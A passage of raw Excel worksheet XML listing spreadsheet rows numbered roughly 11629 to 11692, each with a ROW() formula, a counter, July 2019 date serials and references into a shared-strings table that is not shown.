        <v>10021</v>
      </c>
      <c r="G11629" t="s">
        <v>21680</v>
      </c>
    </row>
    <row r="11630" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11630">
        <f t="shared" si="181"/>
        <v>11629</v>
      </c>
      <c r="B11630">
        <v>1629</v>
      </c>
      <c r="C11630" t="s">
        <v>19637</v>
      </c>
      <c r="D11630" s="1">
        <v>43671</v>
      </c>
      <c r="F11630" t="s">
        <v>10526</v>
      </c>
      <c r="G11630" t="s">
        <v>20942</v>
      </c>
    </row>
    <row r="11631" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11631">
        <f t="shared" si="181"/>
        <v>11630</v>
      </c>
      <c r="B11631">
        <v>1630</v>
      </c>
      <c r="C11631" t="s">
        <v>19637</v>
      </c>
      <c r="D11631" s="1">
        <v>43677</v>
      </c>
      <c r="E11631" t="s">
        <v>21287</v>
      </c>
      <c r="F11631" t="s">
        <v>10526</v>
      </c>
      <c r="G11631" t="s">
        <v>21681</v>
      </c>
    </row>
    <row r="11632" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11632">
        <f t="shared" si="181"/>
        <v>11631</v>
      </c>
      <c r="B11632">
        <v>1631</v>
      </c>
      <c r="C11632" t="s">
        <v>19637</v>
      </c>
      <c r="D11632" s="1">
        <v>43673</v>
      </c>
      <c r="E11632" t="s">
        <v>19668</v>
      </c>
      <c r="F11632" t="s">
        <v>9978</v>
      </c>
      <c r="G11632" t="s">
        <v>21682</v>
      </c>
    </row>
    <row r="11633" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11633">
        <f t="shared" si="181"/>
        <v>11632</v>
      </c>
      <c r="B11633">
        <v>1632</v>
      </c>
      <c r="C11633" t="s">
        <v>19637</v>
      </c>
      <c r="D11633" s="1">
        <v>43672</v>
      </c>
      <c r="E11633" t="s">
        <v>20458</v>
      </c>
      <c r="F11633" t="s">
        <v>9978</v>
      </c>
      <c r="G11633" t="s">
        <v>21683</v>
      </c>
    </row>
    <row r="11634" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11634">
        <f t="shared" si="181"/>
        <v>11633</v>
      </c>
      <c r="B11634">
        <v>1633</v>
      </c>
      <c r="C11634" t="s">
        <v>19637</v>
      </c>
      <c r="D11634" s="1">
        <v>43674</v>
      </c>
      <c r="E11634" t="s">
        <v>21389</v>
      </c>
      <c r="F11634" t="s">
        <v>9975</v>
      </c>
      <c r="G11634" t="s">
        <v>21684</v>
      </c>
    </row>
    <row r="11635" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11635">
        <f t="shared" si="181"/>
        <v>11634</v>
      </c>
      <c r="B11635">
        <v>1634</v>
      </c>
      <c r="C11635" t="s">
        <v>19637</v>
      </c>
      <c r="D11635" s="1">
        <v>43677</v>
      </c>
      <c r="E11635" t="s">
        <v>20037</v>
      </c>
      <c r="F11635" t="s">
        <v>10526</v>
      </c>
      <c r="G11635" t="s">
        <v>21685</v>
      </c>
    </row>
    <row r="11636" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11636">
        <f t="shared" si="181"/>
        <v>11635</v>
      </c>
      <c r="B11636">
        <v>1635</v>
      </c>
      <c r="C11636" t="s">
        <v>19637</v>
      </c>
      <c r="D11636" s="1">
        <v>43673</v>
      </c>
      <c r="E11636" t="s">
        <v>21686</v>
      </c>
      <c r="F11636" t="s">
        <v>10526</v>
      </c>
      <c r="G11636" t="s">
        <v>21687</v>
      </c>
    </row>
    <row r="11637" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11637">
        <f t="shared" si="181"/>
        <v>11636</v>
      </c>
      <c r="B11637">
        <v>1636</v>
      </c>
      <c r="C11637" t="s">
        <v>19637</v>
      </c>
      <c r="D11637" s="1">
        <v>43670</v>
      </c>
      <c r="F11637" t="s">
        <v>10526</v>
      </c>
      <c r="G11637" t="s">
        <v>21688</v>
      </c>
    </row>
    <row r="11638" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11638">
        <f t="shared" si="181"/>
        <v>11637</v>
      </c>
      <c r="B11638">
        <v>1637</v>
      </c>
      <c r="C11638" t="s">
        <v>19637</v>
      </c>
      <c r="D11638" s="1">
        <v>43675</v>
      </c>
      <c r="E11638" t="s">
        <v>19640</v>
      </c>
      <c r="F11638" t="s">
        <v>10021</v>
      </c>
      <c r="G11638" t="s">
        <v>21689</v>
      </c>
    </row>
    <row r="11639" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11639">
        <f t="shared" si="181"/>
        <v>11638</v>
      </c>
      <c r="B11639">
        <v>1638</v>
      </c>
      <c r="C11639" t="s">
        <v>19637</v>
      </c>
      <c r="D11639" s="1">
        <v>43676</v>
      </c>
      <c r="F11639" t="s">
        <v>10526</v>
      </c>
      <c r="G11639" t="s">
        <v>21690</v>
      </c>
    </row>
    <row r="11640" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11640">
        <f t="shared" si="181"/>
        <v>11639</v>
      </c>
      <c r="B11640">
        <v>1639</v>
      </c>
      <c r="C11640" t="s">
        <v>19637</v>
      </c>
      <c r="D11640" s="1">
        <v>43676</v>
      </c>
      <c r="E11640" t="s">
        <v>21691</v>
      </c>
      <c r="F11640" t="s">
        <v>10526</v>
      </c>
      <c r="G11640" t="s">
        <v>21692</v>
      </c>
    </row>
    <row r="11641" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11641">
        <f t="shared" si="181"/>
        <v>11640</v>
      </c>
      <c r="B11641">
        <v>1640</v>
      </c>
      <c r="C11641" t="s">
        <v>19637</v>
      </c>
      <c r="D11641" s="1">
        <v>43674</v>
      </c>
      <c r="F11641" t="s">
        <v>9978</v>
      </c>
      <c r="G11641" t="s">
        <v>21693</v>
      </c>
    </row>
    <row r="11642" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11642">
        <f t="shared" si="181"/>
        <v>11641</v>
      </c>
      <c r="B11642">
        <v>1641</v>
      </c>
      <c r="C11642" t="s">
        <v>19637</v>
      </c>
      <c r="D11642" s="1">
        <v>43675</v>
      </c>
      <c r="E11642" t="s">
        <v>19640</v>
      </c>
      <c r="F11642" t="s">
        <v>9975</v>
      </c>
      <c r="G11642" t="s">
        <v>21694</v>
      </c>
    </row>
    <row r="11643" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11643">
        <f t="shared" si="181"/>
        <v>11642</v>
      </c>
      <c r="B11643">
        <v>1642</v>
      </c>
      <c r="C11643" t="s">
        <v>19637</v>
      </c>
      <c r="D11643" s="1">
        <v>43671</v>
      </c>
      <c r="F11643" t="s">
        <v>10526</v>
      </c>
      <c r="G11643" t="s">
        <v>21360</v>
      </c>
    </row>
    <row r="11644" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11644">
        <f t="shared" si="181"/>
        <v>11643</v>
      </c>
      <c r="B11644">
        <v>1643</v>
      </c>
      <c r="C11644" t="s">
        <v>19637</v>
      </c>
      <c r="D11644" s="1">
        <v>43672</v>
      </c>
      <c r="E11644" t="s">
        <v>21613</v>
      </c>
      <c r="F11644" t="s">
        <v>10526</v>
      </c>
      <c r="G11644" t="s">
        <v>21695</v>
      </c>
    </row>
    <row r="11645" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11645">
        <f t="shared" si="181"/>
        <v>11644</v>
      </c>
      <c r="B11645">
        <v>1644</v>
      </c>
      <c r="C11645" t="s">
        <v>19637</v>
      </c>
      <c r="D11645" s="1">
        <v>43669</v>
      </c>
      <c r="F11645" t="s">
        <v>10526</v>
      </c>
      <c r="G11645" t="s">
        <v>21696</v>
      </c>
    </row>
    <row r="11646" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11646">
        <f t="shared" si="181"/>
        <v>11645</v>
      </c>
      <c r="B11646">
        <v>1645</v>
      </c>
      <c r="C11646" t="s">
        <v>19637</v>
      </c>
      <c r="D11646" s="1">
        <v>43675</v>
      </c>
      <c r="E11646" t="s">
        <v>19750</v>
      </c>
      <c r="F11646" t="s">
        <v>9978</v>
      </c>
      <c r="G11646" t="s">
        <v>21697</v>
      </c>
    </row>
    <row r="11647" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11647">
        <f t="shared" si="181"/>
        <v>11646</v>
      </c>
      <c r="B11647">
        <v>1646</v>
      </c>
      <c r="C11647" t="s">
        <v>19637</v>
      </c>
      <c r="D11647" s="1">
        <v>43672</v>
      </c>
      <c r="E11647" t="s">
        <v>21698</v>
      </c>
      <c r="F11647" t="s">
        <v>9978</v>
      </c>
      <c r="G11647" t="s">
        <v>21699</v>
      </c>
    </row>
    <row r="11648" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11648">
        <f t="shared" si="181"/>
        <v>11647</v>
      </c>
      <c r="B11648">
        <v>1647</v>
      </c>
      <c r="C11648" t="s">
        <v>19637</v>
      </c>
      <c r="D11648" s="1">
        <v>43668</v>
      </c>
      <c r="E11648" t="s">
        <v>19687</v>
      </c>
      <c r="F11648" t="s">
        <v>10021</v>
      </c>
      <c r="G11648" t="s">
        <v>21700</v>
      </c>
    </row>
    <row r="11649" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11649">
        <f t="shared" si="181"/>
        <v>11648</v>
      </c>
      <c r="B11649">
        <v>1648</v>
      </c>
      <c r="C11649" t="s">
        <v>19637</v>
      </c>
      <c r="D11649" s="1">
        <v>43676</v>
      </c>
      <c r="E11649" t="s">
        <v>20167</v>
      </c>
      <c r="F11649" t="s">
        <v>10526</v>
      </c>
      <c r="G11649" t="s">
        <v>21701</v>
      </c>
    </row>
    <row r="11650" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11650">
        <f t="shared" si="181"/>
        <v>11649</v>
      </c>
      <c r="B11650">
        <v>1649</v>
      </c>
      <c r="C11650" t="s">
        <v>19637</v>
      </c>
      <c r="D11650" s="1">
        <v>43675</v>
      </c>
      <c r="E11650" t="s">
        <v>19849</v>
      </c>
      <c r="F11650" t="s">
        <v>10021</v>
      </c>
      <c r="G11650" t="s">
        <v>21702</v>
      </c>
    </row>
    <row r="11651" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11651">
        <f t="shared" ref="A11651:A11714" si="182">+ROW(A11650)</f>
        <v>11650</v>
      </c>
      <c r="B11651">
        <v>1650</v>
      </c>
      <c r="C11651" t="s">
        <v>19637</v>
      </c>
      <c r="D11651" s="1">
        <v>43669</v>
      </c>
      <c r="E11651" t="s">
        <v>19879</v>
      </c>
      <c r="F11651" t="s">
        <v>10021</v>
      </c>
      <c r="G11651" t="s">
        <v>21703</v>
      </c>
    </row>
    <row r="11652" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11652">
        <f t="shared" si="182"/>
        <v>11651</v>
      </c>
      <c r="B11652">
        <v>1651</v>
      </c>
      <c r="C11652" t="s">
        <v>19637</v>
      </c>
      <c r="D11652" s="1">
        <v>43674</v>
      </c>
      <c r="E11652" t="s">
        <v>21704</v>
      </c>
      <c r="F11652" t="s">
        <v>10526</v>
      </c>
      <c r="G11652" t="s">
        <v>21705</v>
      </c>
    </row>
    <row r="11653" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11653">
        <f t="shared" si="182"/>
        <v>11652</v>
      </c>
      <c r="B11653">
        <v>1652</v>
      </c>
      <c r="C11653" t="s">
        <v>19637</v>
      </c>
      <c r="D11653" s="1">
        <v>43677</v>
      </c>
      <c r="E11653" t="s">
        <v>19643</v>
      </c>
      <c r="F11653" t="s">
        <v>10021</v>
      </c>
      <c r="G11653" t="s">
        <v>21706</v>
      </c>
    </row>
    <row r="11654" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11654">
        <f t="shared" si="182"/>
        <v>11653</v>
      </c>
      <c r="B11654">
        <v>1653</v>
      </c>
      <c r="C11654" t="s">
        <v>19637</v>
      </c>
      <c r="D11654" s="1">
        <v>43677</v>
      </c>
      <c r="E11654" t="s">
        <v>19640</v>
      </c>
      <c r="F11654" t="s">
        <v>9975</v>
      </c>
      <c r="G11654" t="s">
        <v>21707</v>
      </c>
    </row>
    <row r="11655" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11655">
        <f t="shared" si="182"/>
        <v>11654</v>
      </c>
      <c r="B11655">
        <v>1654</v>
      </c>
      <c r="C11655" t="s">
        <v>19637</v>
      </c>
      <c r="D11655" s="1">
        <v>43668</v>
      </c>
      <c r="E11655" t="s">
        <v>19640</v>
      </c>
      <c r="F11655" t="s">
        <v>9975</v>
      </c>
      <c r="G11655" t="s">
        <v>21708</v>
      </c>
    </row>
    <row r="11656" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11656">
        <f t="shared" si="182"/>
        <v>11655</v>
      </c>
      <c r="B11656">
        <v>1655</v>
      </c>
      <c r="C11656" t="s">
        <v>19637</v>
      </c>
      <c r="D11656" s="1">
        <v>43674</v>
      </c>
      <c r="E11656" t="s">
        <v>19638</v>
      </c>
      <c r="F11656" t="s">
        <v>10021</v>
      </c>
      <c r="G11656" t="s">
        <v>21709</v>
      </c>
    </row>
    <row r="11657" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11657">
        <f t="shared" si="182"/>
        <v>11656</v>
      </c>
      <c r="B11657">
        <v>1656</v>
      </c>
      <c r="C11657" t="s">
        <v>19637</v>
      </c>
      <c r="D11657" s="1">
        <v>43675</v>
      </c>
      <c r="E11657" t="s">
        <v>21710</v>
      </c>
      <c r="F11657" t="s">
        <v>9978</v>
      </c>
      <c r="G11657" t="s">
        <v>21711</v>
      </c>
    </row>
    <row r="11658" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11658">
        <f t="shared" si="182"/>
        <v>11657</v>
      </c>
      <c r="B11658">
        <v>1657</v>
      </c>
      <c r="C11658" t="s">
        <v>19637</v>
      </c>
      <c r="D11658" s="1">
        <v>43673</v>
      </c>
      <c r="E11658" t="s">
        <v>21389</v>
      </c>
      <c r="F11658" t="s">
        <v>9975</v>
      </c>
      <c r="G11658" t="s">
        <v>21712</v>
      </c>
    </row>
    <row r="11659" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11659">
        <f t="shared" si="182"/>
        <v>11658</v>
      </c>
      <c r="B11659">
        <v>1658</v>
      </c>
      <c r="C11659" t="s">
        <v>19637</v>
      </c>
      <c r="D11659" s="1">
        <v>43673</v>
      </c>
      <c r="E11659" t="s">
        <v>19640</v>
      </c>
      <c r="F11659" t="s">
        <v>10021</v>
      </c>
      <c r="G11659" t="s">
        <v>21713</v>
      </c>
    </row>
    <row r="11660" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11660">
        <f t="shared" si="182"/>
        <v>11659</v>
      </c>
      <c r="B11660">
        <v>1659</v>
      </c>
      <c r="C11660" t="s">
        <v>19637</v>
      </c>
      <c r="D11660" s="1">
        <v>43671</v>
      </c>
      <c r="F11660" t="s">
        <v>9978</v>
      </c>
      <c r="G11660" t="s">
        <v>21714</v>
      </c>
    </row>
    <row r="11661" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11661">
        <f t="shared" si="182"/>
        <v>11660</v>
      </c>
      <c r="B11661">
        <v>1660</v>
      </c>
      <c r="C11661" t="s">
        <v>19637</v>
      </c>
      <c r="D11661" s="1">
        <v>43672</v>
      </c>
      <c r="E11661" t="s">
        <v>20187</v>
      </c>
      <c r="F11661" t="s">
        <v>9975</v>
      </c>
      <c r="G11661" t="s">
        <v>21715</v>
      </c>
    </row>
    <row r="11662" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11662">
        <f t="shared" si="182"/>
        <v>11661</v>
      </c>
      <c r="B11662">
        <v>1661</v>
      </c>
      <c r="C11662" t="s">
        <v>19637</v>
      </c>
      <c r="D11662" s="1">
        <v>43676</v>
      </c>
      <c r="F11662" t="s">
        <v>10526</v>
      </c>
      <c r="G11662" t="s">
        <v>21716</v>
      </c>
    </row>
    <row r="11663" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11663">
        <f t="shared" si="182"/>
        <v>11662</v>
      </c>
      <c r="B11663">
        <v>1662</v>
      </c>
      <c r="C11663" t="s">
        <v>19637</v>
      </c>
      <c r="D11663" s="1">
        <v>43671</v>
      </c>
      <c r="E11663" t="s">
        <v>21717</v>
      </c>
      <c r="F11663" t="s">
        <v>10526</v>
      </c>
      <c r="G11663" t="s">
        <v>21718</v>
      </c>
    </row>
    <row r="11664" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11664">
        <f t="shared" si="182"/>
        <v>11663</v>
      </c>
      <c r="B11664">
        <v>1663</v>
      </c>
      <c r="C11664" t="s">
        <v>19637</v>
      </c>
      <c r="D11664" s="1">
        <v>43677</v>
      </c>
      <c r="E11664" t="s">
        <v>19640</v>
      </c>
      <c r="F11664" t="s">
        <v>10021</v>
      </c>
      <c r="G11664" t="s">
        <v>21719</v>
      </c>
    </row>
    <row r="11665" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11665">
        <f t="shared" si="182"/>
        <v>11664</v>
      </c>
      <c r="B11665">
        <v>1664</v>
      </c>
      <c r="C11665" t="s">
        <v>19637</v>
      </c>
      <c r="D11665" s="1">
        <v>43669</v>
      </c>
      <c r="E11665" t="s">
        <v>19672</v>
      </c>
      <c r="F11665" t="s">
        <v>10021</v>
      </c>
      <c r="G11665" t="s">
        <v>21720</v>
      </c>
    </row>
    <row r="11666" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11666">
        <f t="shared" si="182"/>
        <v>11665</v>
      </c>
      <c r="B11666">
        <v>1665</v>
      </c>
      <c r="C11666" t="s">
        <v>19637</v>
      </c>
      <c r="D11666" s="1">
        <v>43673</v>
      </c>
      <c r="E11666" t="s">
        <v>19796</v>
      </c>
      <c r="F11666" t="s">
        <v>10021</v>
      </c>
      <c r="G11666" t="s">
        <v>21721</v>
      </c>
    </row>
    <row r="11667" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11667">
        <f t="shared" si="182"/>
        <v>11666</v>
      </c>
      <c r="B11667">
        <v>1666</v>
      </c>
      <c r="C11667" t="s">
        <v>19637</v>
      </c>
      <c r="D11667" s="1">
        <v>43673</v>
      </c>
      <c r="E11667" t="s">
        <v>19717</v>
      </c>
      <c r="F11667" t="s">
        <v>10526</v>
      </c>
      <c r="G11667" t="s">
        <v>21722</v>
      </c>
    </row>
    <row r="11668" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11668">
        <f t="shared" si="182"/>
        <v>11667</v>
      </c>
      <c r="B11668">
        <v>1667</v>
      </c>
      <c r="C11668" t="s">
        <v>19637</v>
      </c>
      <c r="D11668" s="1">
        <v>43676</v>
      </c>
      <c r="E11668" t="s">
        <v>19959</v>
      </c>
      <c r="F11668" t="s">
        <v>10021</v>
      </c>
      <c r="G11668" t="s">
        <v>21723</v>
      </c>
    </row>
    <row r="11669" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11669">
        <f t="shared" si="182"/>
        <v>11668</v>
      </c>
      <c r="B11669">
        <v>1668</v>
      </c>
      <c r="C11669" t="s">
        <v>19637</v>
      </c>
      <c r="D11669" s="1">
        <v>43672</v>
      </c>
      <c r="F11669" t="s">
        <v>10021</v>
      </c>
      <c r="G11669" t="s">
        <v>21724</v>
      </c>
    </row>
    <row r="11670" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11670">
        <f t="shared" si="182"/>
        <v>11669</v>
      </c>
      <c r="B11670">
        <v>1669</v>
      </c>
      <c r="C11670" t="s">
        <v>19637</v>
      </c>
      <c r="D11670" s="1">
        <v>43669</v>
      </c>
      <c r="E11670" t="s">
        <v>21725</v>
      </c>
      <c r="F11670" t="s">
        <v>10526</v>
      </c>
      <c r="G11670" t="s">
        <v>21726</v>
      </c>
    </row>
    <row r="11671" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11671">
        <f t="shared" si="182"/>
        <v>11670</v>
      </c>
      <c r="B11671">
        <v>1670</v>
      </c>
      <c r="C11671" t="s">
        <v>19637</v>
      </c>
      <c r="D11671" s="1">
        <v>43669</v>
      </c>
      <c r="E11671" t="s">
        <v>21727</v>
      </c>
      <c r="F11671" t="s">
        <v>10526</v>
      </c>
      <c r="G11671" t="s">
        <v>21728</v>
      </c>
    </row>
    <row r="11672" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11672">
        <f t="shared" si="182"/>
        <v>11671</v>
      </c>
      <c r="B11672">
        <v>1671</v>
      </c>
      <c r="C11672" t="s">
        <v>19637</v>
      </c>
      <c r="D11672" s="1">
        <v>43674</v>
      </c>
      <c r="E11672" t="s">
        <v>19640</v>
      </c>
      <c r="F11672" t="s">
        <v>10021</v>
      </c>
      <c r="G11672" t="s">
        <v>21729</v>
      </c>
    </row>
    <row r="11673" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11673">
        <f t="shared" si="182"/>
        <v>11672</v>
      </c>
      <c r="B11673">
        <v>1672</v>
      </c>
      <c r="C11673" t="s">
        <v>19637</v>
      </c>
      <c r="D11673" s="1">
        <v>43669</v>
      </c>
      <c r="F11673" t="s">
        <v>10526</v>
      </c>
      <c r="G11673" t="s">
        <v>21730</v>
      </c>
    </row>
    <row r="11674" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11674">
        <f t="shared" si="182"/>
        <v>11673</v>
      </c>
      <c r="B11674">
        <v>1673</v>
      </c>
      <c r="C11674" t="s">
        <v>19637</v>
      </c>
      <c r="D11674" s="1">
        <v>43672</v>
      </c>
      <c r="E11674" t="s">
        <v>19640</v>
      </c>
      <c r="F11674" t="s">
        <v>9975</v>
      </c>
      <c r="G11674" t="s">
        <v>21731</v>
      </c>
    </row>
    <row r="11675" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11675">
        <f t="shared" si="182"/>
        <v>11674</v>
      </c>
      <c r="B11675">
        <v>1674</v>
      </c>
      <c r="C11675" t="s">
        <v>19637</v>
      </c>
      <c r="D11675" s="1">
        <v>43670</v>
      </c>
      <c r="F11675" t="s">
        <v>10526</v>
      </c>
      <c r="G11675" t="s">
        <v>21732</v>
      </c>
    </row>
    <row r="11676" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11676">
        <f t="shared" si="182"/>
        <v>11675</v>
      </c>
      <c r="B11676">
        <v>1675</v>
      </c>
      <c r="C11676" t="s">
        <v>19637</v>
      </c>
      <c r="D11676" s="1">
        <v>43672</v>
      </c>
      <c r="E11676" t="s">
        <v>20220</v>
      </c>
      <c r="F11676" t="s">
        <v>10021</v>
      </c>
      <c r="G11676" t="s">
        <v>21733</v>
      </c>
    </row>
    <row r="11677" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11677">
        <f t="shared" si="182"/>
        <v>11676</v>
      </c>
      <c r="B11677">
        <v>1676</v>
      </c>
      <c r="C11677" t="s">
        <v>19637</v>
      </c>
      <c r="D11677" s="1">
        <v>43676</v>
      </c>
      <c r="E11677" t="s">
        <v>21734</v>
      </c>
      <c r="F11677" t="s">
        <v>10526</v>
      </c>
      <c r="G11677" t="s">
        <v>21735</v>
      </c>
    </row>
    <row r="11678" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11678">
        <f t="shared" si="182"/>
        <v>11677</v>
      </c>
      <c r="B11678">
        <v>1677</v>
      </c>
      <c r="C11678" t="s">
        <v>19637</v>
      </c>
      <c r="D11678" s="1">
        <v>43676</v>
      </c>
      <c r="E11678" t="s">
        <v>19715</v>
      </c>
      <c r="F11678" t="s">
        <v>10021</v>
      </c>
      <c r="G11678" t="s">
        <v>21736</v>
      </c>
    </row>
    <row r="11679" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11679">
        <f t="shared" si="182"/>
        <v>11678</v>
      </c>
      <c r="B11679">
        <v>1678</v>
      </c>
      <c r="C11679" t="s">
        <v>19637</v>
      </c>
      <c r="D11679" s="1">
        <v>43676</v>
      </c>
      <c r="E11679" t="s">
        <v>19959</v>
      </c>
      <c r="F11679" t="s">
        <v>10021</v>
      </c>
      <c r="G11679" t="s">
        <v>21737</v>
      </c>
    </row>
    <row r="11680" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11680">
        <f t="shared" si="182"/>
        <v>11679</v>
      </c>
      <c r="B11680">
        <v>1679</v>
      </c>
      <c r="C11680" t="s">
        <v>19637</v>
      </c>
      <c r="D11680" s="1">
        <v>43676</v>
      </c>
      <c r="E11680" t="s">
        <v>20293</v>
      </c>
      <c r="F11680" t="s">
        <v>10526</v>
      </c>
      <c r="G11680" t="s">
        <v>21738</v>
      </c>
    </row>
    <row r="11681" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11681">
        <f t="shared" si="182"/>
        <v>11680</v>
      </c>
      <c r="B11681">
        <v>1680</v>
      </c>
      <c r="C11681" t="s">
        <v>19637</v>
      </c>
      <c r="D11681" s="1">
        <v>43671</v>
      </c>
      <c r="F11681" t="s">
        <v>10526</v>
      </c>
      <c r="G11681" t="s">
        <v>21739</v>
      </c>
    </row>
    <row r="11682" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11682">
        <f t="shared" si="182"/>
        <v>11681</v>
      </c>
      <c r="B11682">
        <v>1681</v>
      </c>
      <c r="C11682" t="s">
        <v>19637</v>
      </c>
      <c r="D11682" s="1">
        <v>43675</v>
      </c>
      <c r="E11682" t="s">
        <v>20751</v>
      </c>
      <c r="F11682" t="s">
        <v>10021</v>
      </c>
      <c r="G11682" t="s">
        <v>21740</v>
      </c>
    </row>
    <row r="11683" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11683">
        <f t="shared" si="182"/>
        <v>11682</v>
      </c>
      <c r="B11683">
        <v>1682</v>
      </c>
      <c r="C11683" t="s">
        <v>19637</v>
      </c>
      <c r="D11683" s="1">
        <v>43669</v>
      </c>
      <c r="E11683" t="s">
        <v>21741</v>
      </c>
      <c r="F11683" t="s">
        <v>9978</v>
      </c>
      <c r="G11683" t="s">
        <v>21742</v>
      </c>
    </row>
    <row r="11684" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11684">
        <f t="shared" si="182"/>
        <v>11683</v>
      </c>
      <c r="B11684">
        <v>1683</v>
      </c>
      <c r="C11684" t="s">
        <v>19637</v>
      </c>
      <c r="D11684" s="1">
        <v>43674</v>
      </c>
      <c r="F11684" t="s">
        <v>10526</v>
      </c>
      <c r="G11684" t="s">
        <v>21743</v>
      </c>
    </row>
    <row r="11685" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11685">
        <f t="shared" si="182"/>
        <v>11684</v>
      </c>
      <c r="B11685">
        <v>1684</v>
      </c>
      <c r="C11685" t="s">
        <v>19637</v>
      </c>
      <c r="D11685" s="1">
        <v>43671</v>
      </c>
      <c r="E11685" t="s">
        <v>21389</v>
      </c>
      <c r="F11685" t="s">
        <v>9975</v>
      </c>
      <c r="G11685" t="s">
        <v>21744</v>
      </c>
    </row>
    <row r="11686" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11686">
        <f t="shared" si="182"/>
        <v>11685</v>
      </c>
      <c r="B11686">
        <v>1685</v>
      </c>
      <c r="C11686" t="s">
        <v>19637</v>
      </c>
      <c r="D11686" s="1">
        <v>43673</v>
      </c>
      <c r="E11686" t="s">
        <v>20167</v>
      </c>
      <c r="F11686" t="s">
        <v>10526</v>
      </c>
      <c r="G11686" t="s">
        <v>21745</v>
      </c>
    </row>
    <row r="11687" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11687">
        <f t="shared" si="182"/>
        <v>11686</v>
      </c>
      <c r="B11687">
        <v>1686</v>
      </c>
      <c r="C11687" t="s">
        <v>19637</v>
      </c>
      <c r="D11687" s="1">
        <v>43670</v>
      </c>
      <c r="E11687" t="s">
        <v>21746</v>
      </c>
      <c r="F11687" t="s">
        <v>10526</v>
      </c>
      <c r="G11687" t="s">
        <v>21747</v>
      </c>
    </row>
    <row r="11688" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11688">
        <f t="shared" si="182"/>
        <v>11687</v>
      </c>
      <c r="B11688">
        <v>1687</v>
      </c>
      <c r="C11688" t="s">
        <v>19637</v>
      </c>
      <c r="D11688" s="1">
        <v>43676</v>
      </c>
      <c r="E11688" t="s">
        <v>19776</v>
      </c>
      <c r="F11688" t="s">
        <v>10021</v>
      </c>
      <c r="G11688" t="s">
        <v>21748</v>
      </c>
    </row>
    <row r="11689" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11689">
        <f t="shared" si="182"/>
        <v>11688</v>
      </c>
      <c r="B11689">
        <v>1688</v>
      </c>
      <c r="C11689" t="s">
        <v>19637</v>
      </c>
      <c r="D11689" s="1">
        <v>43677</v>
      </c>
      <c r="E11689" t="s">
        <v>20789</v>
      </c>
      <c r="F11689" t="s">
        <v>10526</v>
      </c>
      <c r="G11689" t="s">
        <v>21749</v>
      </c>
    </row>
    <row r="11690" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11690">
        <f t="shared" si="182"/>
        <v>11689</v>
      </c>
      <c r="B11690">
        <v>1689</v>
      </c>
      <c r="C11690" t="s">
        <v>19637</v>
      </c>
      <c r="D11690" s="1">
        <v>43668</v>
      </c>
      <c r="F11690" t="s">
        <v>10526</v>
      </c>
      <c r="G11690" t="s">
        <v>21750</v>
      </c>
    </row>
    <row r="11691" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11691">
        <f t="shared" si="182"/>
        <v>11690</v>
      </c>
      <c r="B11691">
        <v>1690</v>
      </c>
      <c r="C11691" t="s">
        <v>19637</v>
      </c>
      <c r="D11691" s="1">
        <v>43677</v>
      </c>
      <c r="E11691" t="s">
        <v>19650</v>
      </c>
      <c r="F11691" t="s">
        <v>10021</v>
      </c>
      <c r="G11691" t="s">
        <v>21751</v>
      </c>
    </row>
    <row r="11692" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11692">
        <f t="shared" si="182"/>
        <v>11691</v>
      </c>
      <c r="B11692">
